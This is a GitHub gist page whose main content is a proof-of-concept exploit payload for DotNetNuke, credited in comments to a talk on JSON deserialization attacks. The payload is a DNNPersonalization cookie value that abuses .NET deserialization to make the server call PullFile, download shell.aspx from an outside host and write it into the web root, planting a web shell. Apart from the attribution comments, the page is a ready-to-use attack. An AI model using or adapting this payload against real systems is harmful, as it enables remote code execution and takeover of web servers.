Skip to content

Instantly share code, notes, and snippets.

@GlitchWitch
Created October 29, 2018 21:04
Show Gist options
  • Save GlitchWitch/76860f85d662c300261b067eee034f15 to your computer and use it in GitHub Desktop.
Save GlitchWitch/76860f85d662c300261b067eee034f15 to your computer and use it in GitHub Desktop.
DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us
@GlitchWitch
Copy link
Author

PoC Transcribed from Friday the 13th: JSON Attacks by @pwntester

@GlitchWitch
Copy link
Author

GlitchWitch commented Nov 5, 2018

After posting this gist, @pwntester shared some additional payloads here.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment